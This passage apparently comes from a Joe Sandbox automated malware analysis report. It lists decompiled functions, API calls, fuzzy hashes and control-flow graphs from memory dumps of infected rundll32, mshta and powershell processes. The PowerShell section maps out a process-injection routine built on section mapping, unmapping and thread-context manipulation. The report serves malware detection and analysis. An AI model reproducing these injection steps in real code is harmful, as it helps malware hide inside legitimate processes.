                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 3867366388-0
                                                          • Opcode ID: 4321fca381cfb6621422fa889dc00bbc46eb528ae2ca785c3b19d6a06a0c3d86
                                                          • Instruction ID: 3905df508c0552d6fb25e2cf0373b663ee696f4fa13b1506d558296f48dcb7e8
                                                          • Opcode Fuzzy Hash: 4321fca381cfb6621422fa889dc00bbc46eb528ae2ca785c3b19d6a06a0c3d86
                                                          • Instruction Fuzzy Hash: B5314A31904109FFCF12AF99DC858AEBFB5FF94320B054556F926A2160CB359A51EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572A64, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: ba14cb9e650df1972b00c435ff13645586936e1a86fcddbf6af39a22893596f4
                                                          • Instruction ID: 570e527ca016ef490f07b8b6baaaf8f957ecfd942bb91959b8f57963dfc3b32d
                                                          • Opcode Fuzzy Hash: ba14cb9e650df1972b00c435ff13645586936e1a86fcddbf6af39a22893596f4
                                                          • Instruction Fuzzy Hash: 7A216F7660090ABBCB219F61EC84D667BB9FF09304F540519E94A96C10D772E4B1DFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592B55, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6), ref: 05592B61
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 055945A7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05592B8F,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60), ref: 055945B5
                                                            • Part of subcall function 055945A7: StrChrA.SHLWAPI(?,0000003F,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6,?,?), ref: 055945BF
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 05592BBF
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05592BCF
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05592BDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: da721d7cf784b4f901870809ca90c67bd6bc229398c46783ffecaddefa5da3d8
                                                          • Instruction ID: 3fafbcc7a5bfc452fc199dd2774753a73d30911dec57289bcffb65578009be82
                                                          • Opcode Fuzzy Hash: da721d7cf784b4f901870809ca90c67bd6bc229398c46783ffecaddefa5da3d8
                                                          • Instruction Fuzzy Hash: E421D27660825AFBCF12AFB5D888EAE7FEAFF45290F054051F9059B200DB38D90497E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E542AE, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E00E542AE(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00E55FBC(_t2);
				if(_t34 != 0) {
					_t30 = E00E55FBC(_t28);
					if(_t30 == 0) {
						E00E513CC(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00E57838(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00E57838(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x00e542ae
                                                          0x00e542b8
                                                          0x00e542ba
                                                          0x00e542c0
                                                          0x00e542c0
                                                          0x00e542c9
                                                          0x00e542cd
                                                          0x00e542d9
                                                          0x00e542dd
                                                          0x00e54351
                                                          0x00e542df
                                                          0x00e542df
                                                          0x00e542e3
                                                          0x00e542ea
                                                          0x00e542ed
                                                          0x00e54307
                                                          0x00e542f6
                                                          0x00e542f6
                                                          0x00e542fa
                                                          0x00e542fd
                                                          0x00e54302
                                                          0x00e54302
                                                          0x00e5430c
                                                          0x00e54334
                                                          0x00e5433a
                                                          0x00e5433d
                                                          0x00e5430e
                                                          0x00e54310
                                                          0x00e54318
                                                          0x00e54323
                                                          0x00e54328
                                                          0x00e54328
                                                          0x00e54344
                                                          0x00e5434b
                                                          0x00e5434c
                                                          0x00e5434c
                                                          0x00e542dd
                                                          0x00e5435c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3,?,051B9698), ref: 00E542BA
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                            • Part of subcall function 00E57838: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00E542E8,00000000,00000001,00000001,?,?,00E51314,00000000,00000000,00000000,051B9698), ref: 00E57846
                                                            • Part of subcall function 00E57838: StrChrA.SHLWAPI(?,0000003F,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60,?), ref: 00E57850
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3), ref: 00E54318
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54328
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54334
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: d52292bf8c9a02cc5f6d961df64370a89dccca5744ff312866577d8b04b3bc3c
                                                          • Instruction ID: df766e5572e45827e64610df5d90a6f3f5e03e644b8aa26c0c146c98f2aff584
                                                          • Opcode Fuzzy Hash: d52292bf8c9a02cc5f6d961df64370a89dccca5744ff312866577d8b04b3bc3c
                                                          • Instruction Fuzzy Hash: A521AEB2500215ABCB125F68C848ADFBFE89F0639AF045854FD09AB262D731C948D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558C741, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 88bf436ddb73211ec62b6a0d81339024bc777206418987d1c0b4b13b9e441aa2
                                                          • Instruction ID: d9d1370d12b2d7e4da8b62c95efca2c0c61a8f093884985e0c5cb7b9b2fd4950
                                                          • Opcode Fuzzy Hash: 88bf436ddb73211ec62b6a0d81339024bc777206418987d1c0b4b13b9e441aa2
                                                          • Instruction Fuzzy Hash: 5B118C7260490AFBDB20AFA0DC44E76B779FF09310B040519EA46A9C10E772F9B19BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E51370, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E51370(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00E55FBC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x00e51385
                                                          0x00e51389
                                                          0x00e51393
                                                          0x00e5139a
                                                          0x00e5139d
                                                          0x00e5139f
                                                          0x00e513a7
                                                          0x00e513ac
                                                          0x00e513ba
                                                          0x00e513bf
                                                          0x00e513c9

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,051B930C,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E51380
                                                          • lstrlenW.KERNEL32(00E553B4,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E51387
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E513A7
                                                          • memcpy.NTDLL(751469A0,00E553B4,00000002,00000000,004F0053,751469A0,?,?,00E553B4,004F0053,051B930C), ref: 00E513BA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 141288c27905332491b4c63371989fd13e5921d268ac65fcd4827baaad63e9c1
                                                          • Instruction ID: 09c56257944f6537f41ef567cc8faa20f09571808610133ea1cad91b78c10986
                                                          • Opcode Fuzzy Hash: 141288c27905332491b4c63371989fd13e5921d268ac65fcd4827baaad63e9c1
                                                          • Instruction Fuzzy Hash: 39F03C32901118BBCF10DBA9CC85C8F7BECEF092557014466BE04E7112E731EA189BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588944, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05588955
                                                          • lstrlen.KERNEL32(?,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 0558895A
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?), ref: 05588976
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05588994
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 1697500751-0
                                                          • Opcode ID: ccf5590956582921efdca14e2c379c4c931e38c865701cb721762521b212d3e9
                                                          • Instruction ID: b4f227b91340bbfdb7e55867ba4a137ee72482c59e4ffca33e3fd3184b0953d0
                                                          • Opcode Fuzzy Hash: ccf5590956582921efdca14e2c379c4c931e38c865701cb721762521b212d3e9
                                                          • Instruction Fuzzy Hash: 52F0C276508742FBD32166AA9C48E77BF98FFC5310B490516E55593100E735D4188BB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05575995, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(059B9986,00000000,751881D0,00000000,05581B94,00000000), ref: 055759A5
                                                          • lstrlen.KERNEL32(?), ref: 055759AD
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,059B9986), ref: 055759C1
                                                          • lstrcat.KERNEL32(00000000,?), ref: 055759CC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 54d48e214c6af850441d4da6cf1f6a7f6beec1ca0687b50507f308c149ece15f
                                                          • Instruction ID: edb969e7f12800e5c399b166e5f79260d9780ff01188668bb77f9080bd0ba18a
                                                          • Opcode Fuzzy Hash: 54d48e214c6af850441d4da6cf1f6a7f6beec1ca0687b50507f308c149ece15f
                                                          • Instruction Fuzzy Hash: D7E09233615225A787115BE9AC88CAFFFACFFC96503050417F600D3100CB2998189BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55C8D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                          • lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                          • lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 133ebc38b20ef07a610d1683f3f21f6460631e1d526964678ac3a3d0f23121f0
                                                          • Instruction ID: 5cdaf4ee6caf24bff9d75c3d0f626b082a7f26af694ce3a150ed134d7ad439e6
                                                          • Opcode Fuzzy Hash: 133ebc38b20ef07a610d1683f3f21f6460631e1d526964678ac3a3d0f23121f0
                                                          • Instruction Fuzzy Hash: F2E01273501721AB87115BE59C48C9FFBADFF997573080C5AFA01E3211C7249809DBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: mshta.exe PID: 6556 Parent PID: 3472 mshta.exeCOMMON

                                                          Executed Functions

                                                          Function 0000015293BA0FC1, Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000003.635936697.0000015293BA0000.00000010.00000001.sdmp, Offset: 0000015293BA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_3_15293ba0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 0e7f58dc76aaff395a004bda258dc4fc36231e99e24942ad0ca517c9f7c1859b
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 5D900215495C5695D41411910C5529C508063D9259FD45480C41AE4244D45E02961152
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015293BA0FB9, Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000003.635936697.0000015293BA0000.00000010.00000001.sdmp, Offset: 0000015293BA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_3_15293ba0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 0e7f58dc76aaff395a004bda258dc4fc36231e99e24942ad0ca517c9f7c1859b
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 5D900215495C5695D41411910C5529C508063D9259FD45480C41AE4244D45E02961152
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: powershell.exe PID: 6948 Parent PID: 6556 powershell.exeCOMMON

                                                          Executed Functions

                                                          Function 000002174F3EE95C, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 643COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 2174f3ee95c-2174f3ee9b8 1 2174f3ee9cf-2174f3ee9d7 0->1 2 2174f3ee9ba-2174f3ee9cd 0->2 3 2174f3ee9dc-2174f3ee9e4 1->3 2->3 4 2174f3ee9e6-2174f3ee9e9 3->4 5 2174f3ee9ee-2174f3ee9f3 3->5 8 2174f3eefee-2174f3ef00a 4->8 6 2174f3ee9f5-2174f3eea12 5->6 7 2174f3eea38-2174f3eea42 5->7 14 2174f3eea14-2174f3eea17 6->14 15 2174f3eea1c-2174f3eea36 call 2174f3ddf20 6->15 9 2174f3eef6e 7->9 10 2174f3eea48-2174f3eea58 7->10 12 2174f3eef73-2174f3eef76 9->12 10->9 13 2174f3eea5e-2174f3eea68 10->13 16 2174f3eef78-2174f3eef82 NtUnmapViewOfSection 12->16 17 2174f3eef87-2174f3eef8a 12->17 18 2174f3eec95-2174f3eec98 13->18 19 2174f3eea6e-2174f3eea72 13->19 22 2174f3eefc5-2174f3eefcd 14->22 15->7 16->17 24 2174f3eefc0-2174f3eefc1 17->24 25 2174f3eef8c-2174f3eef97 17->25 20 2174f3eec9e-2174f3eeca3 18->20 21 2174f3eea78-2174f3eeab3 call 2174f3e5b80 18->21 19->20 19->21 20->22 36 2174f3eeab9-2174f3eeaef call 2174f3e8b90 21->36 37 2174f3eef67-2174f3eef6c 21->37 22->8 26 2174f3eefcf-2174f3eefe6 call 2174f3e10cc 22->26 24->22 28 2174f3eefa2-2174f3eefb8 25->28 29 2174f3eef99-2174f3eef9b 25->29 26->8 28->24 29->28 32 2174f3eef9d-2174f3eefa0 29->32 32->24 36->12 41 2174f3eeaf5-2174f3eeb09 call 2174f3e6e1c 36->41 37->12 41->12 44 2174f3eeb0f-2174f3eeb12 41->44 45 2174f3eeb14-2174f3eeb1e call 2174f3fdb0a 44->45 46 2174f3eeb23-2174f3eeb28 44->46 45->46 48 2174f3eeb53-2174f3eeb79 call 2174f3fdb0a 46->48 49 2174f3eeb2a-2174f3eeb30 46->49 54 2174f3eeb8c-2174f3eeb90 48->54 55 2174f3eeb7b-2174f3eeb89 48->55 49->48 50 2174f3eeb32-2174f3eeb33 49->50 52 2174f3eeb36-2174f3eeb51 50->52 52->48 52->52 56 2174f3eeb92-2174f3eeba6 54->56 57 2174f3eeba9-2174f3eebb6 54->57 55->54 56->57 58 2174f3eebbc-2174f3eebe6 57->58 59 2174f3eeca8-2174f3eecaf 57->59 60 2174f3eebfe-2174f3eec21 call 2174f3f4ba0 58->60 61 2174f3eebe8-2174f3eebef 58->61 62 2174f3eecb1-2174f3eecb8 59->62 63 2174f3eecc7-2174f3eecec 59->63 72 2174f3eed78-2174f3eed7a 60->72 73 2174f3eec27-2174f3eec4e call 2174f3f4ba0 60->73 61->60 64 2174f3eebf1-2174f3eebf8 61->64 62->63 65 2174f3eecba-2174f3eecc1 62->65 63->72 74 2174f3eecf2-2174f3eed16 call 2174f3f99d0 63->74 64->60 67 2174f3eec83-2174f3eec90 64->67 65->63 68 2174f3eed66-2174f3eed6a 65->68 71 2174f3eed70-2174f3eed73 call 2174f3fdb0a 67->71 68->71 71->72 72->12 76 2174f3eed80-2174f3eedc4 call 2174f3fdb0a 72->76 73->72 83 2174f3eec54-2174f3eec7b call 2174f3f4ba0 73->83 74->72 84 2174f3eed18-2174f3eed3c call 2174f3f99d0 74->84 90 2174f3eef4c-2174f3eef4e 76->90 91 2174f3eedca-2174f3eee0f call 2174f3e10cc * 2 76->91 83->72 92 2174f3eec81 83->92 84->72 93 2174f3eed3e-2174f3eed62 call 2174f3f99d0 84->93 90->12 94 2174f3eef50-2174f3eef5b 90->94 103 2174f3eee15-2174f3eee42 call 2174f3dfca8 91->103 104 2174f3eef1b-2174f3eef22 91->104 92->67 93->72 100 2174f3eed64 93->100 94->12 98 2174f3eef5d-2174f3eef65 94->98 98->12 100->68 108 2174f3eef32-2174f3eef38 103->108 109 2174f3eee48-2174f3eee55 103->109 110 2174f3eef24-2174f3eef29 104->110 111 2174f3eef2b 104->111 114 2174f3eef3a-2174f3eef44 108->114 112 2174f3eee6d-2174f3eee6f 109->112 113 2174f3eee57-2174f3eee6b 109->113 110->114 115 2174f3eef2d-2174f3eef30 111->115 112->115 116 2174f3eee75-2174f3eeeca call 2174f3fdb0a 112->116 113->112 114->90 115->108 115->114 122 2174f3eeed4-2174f3eeef2 call 2174f3e1950 116->122 123 2174f3eeecc-2174f3eeed1 116->123 122->114 126 2174f3eeef4-2174f3eef01 122->126 123->122 126->115 127 2174f3eef03-2174f3eef0f NtSetContextThread 126->127 128 2174f3eef17-2174f3eef19 127->128 128->115
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction ID: eea262634f3670937933a653d36d7d38b38be6a3b683d3daad04cbcb68dc3413
                                                          • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction Fuzzy Hash: BF223030618A098FEB99EF5CD8897E673F1FBA8301F41452DE44AC3295DF34E9858B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3F20A4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationQueryToken
                                                          • String ID: 0
                                                          • API String ID: 4239771691-4108050209
                                                          • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction ID: fc0ae499c62046124230c3a728b69364000ffbbe0ba114ff46b799e4d74dec45
                                                          • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction Fuzzy Hash: 97410930618B498FDB64EF19D888BAAB7F1FBD8301F50492DE48AC3255CB34D945CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3FA8F0, Relevance: 4.7, APIs: 3, Instructions: 197nativethreadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInformationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 3020566308-0
                                                          • Opcode ID: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                          • Instruction ID: 97e1c1a6b7b406f90ff6f4c9e2f69cbb8742e4384f45be5d67988e0967530d1a
                                                          • Opcode Fuzzy Hash: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                          • Instruction Fuzzy Hash: 5451523061CB098FEF64EF6CD8897AA77F1EBA9301F00452DE94AC3291DE35D8458752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000002174F3E5B80, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 2174f3e5b80-2174f3e5bc2 229 2174f3e5d93 227->229 230 2174f3e5bc8-2174f3e5c0b 227->230 231 2174f3e5d98-2174f3e5dbb 229->231 234 2174f3e5c11-2174f3e5c30 230->234 235 2174f3e5d7f-2174f3e5d91 230->235 234->235 238 2174f3e5c36-2174f3e5c55 234->238 235->231 238->235 240 2174f3e5c5b-2174f3e5c7a 238->240 240->235 242 2174f3e5c80-2174f3e5c9f 240->242 242->235 244 2174f3e5ca5-2174f3e5d27 call 2174f3e10cc NtCreateSection 242->244 247 2174f3e5d6e-2174f3e5d73 244->247 248 2174f3e5d29-2174f3e5d46 call 2174f3e8b90 244->248 252 2174f3e5d75-2174f3e5d77 247->252 253 2174f3e5d64-2174f3e5d6c 248->253 254 2174f3e5d48-2174f3e5d62 call 2174f3e10cc 248->254 252->235 255 2174f3e5d79-2174f3e5d7d 252->255 253->252 254->252 255->231
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                          • Instruction ID: bea54dae6c51707c0795a5047922981faefbde23f8179380f5ef126bb2fa4ebc
                                                          • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
